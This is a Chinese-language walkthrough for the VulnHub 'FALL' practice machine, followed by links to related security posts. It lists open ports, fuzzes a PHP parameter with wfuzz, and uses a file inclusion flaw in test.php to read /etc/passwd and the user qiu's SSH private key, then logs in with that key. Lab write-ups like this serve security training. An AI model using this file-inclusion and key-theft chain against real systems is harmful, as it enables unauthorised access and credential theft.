VulnHub-FALL通关攻略

第一步:确定靶机IP为192.168.40.129
第二步:扫描后台及开放端口
复制代码
#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
139 --- NetBIOS服务
443 --- 	https服务
445 --- SMB协议
3306 --- Mysql
8080 --- Internet 信息服务
第三步:尝试访问扫到的端口和文件
第四步:尝试使用kali自带的FUZZ
复制代码
#使用kali自带的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
第五步:尝试访问/etc/passwd敏感文件,发现qiu用户,且权限为1000
复制代码
#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
第六步:尝试查看用户qiu的 ssh 密钥
复制代码
#查看用户qiu的 ssh 密钥  
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
第七步:尝试利用文件包含来得到qiu的ssh私钥文件,并使用cat查看
复制代码
#得到ssh私钥文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
第八步:给予密钥文件权限为600,以正常使用
复制代码
chmod 600 id_rsa
第九步:使用这个私钥登录qiu用户,发现连接成功
复制代码
 ssh -i id_rsa qiu@192.168.40.129

FROM IYU_

相关推荐
还是做不到嘛\.24 分钟前
Dvwa靶场-SQL Injection
数据库·sql·web安全
CDN36024 分钟前
360CDN 全系列产品体验:CDN / 高防 / SDK 游戏盾横向测评
运维·安全·游戏
小陈工32 分钟前
2026年3月26日技术资讯洞察:WebAssembly崛起、AI代码质量危机与开源安全新挑战
人工智能·python·安全·架构·开源·fastapi·wasm
大方子2 小时前
【PolarCTF】路由自启动
网络安全·polarctf
LlNingyu3 小时前
文艺复兴,什么是XSS,常见形式(一)
前端·安全·web安全·xss
CDN3603 小时前
中小团队加速 + 防护方案:360CDN+SDK 游戏盾实测
运维·游戏·网络安全
LlNingyu4 小时前
文艺复兴,什么是XSS,常见形式(二)
前端·安全·xss
向往着的青绿色5 小时前
备份是个好习惯 BugKuCTF题目题解
网络安全·php·安全威胁分析·ctf·安全架构·安全性测试·威胁分析
北京软秦科技有限公司5 小时前
AI报告审核守护公共卫生安全:IACheck助力公共纺织品卫生检测报告合规与健康保障
大数据·人工智能·安全
阆遤5 小时前
利用TRAE对nanobot进行安全分析并优化
python·安全·ai·trae·nanobot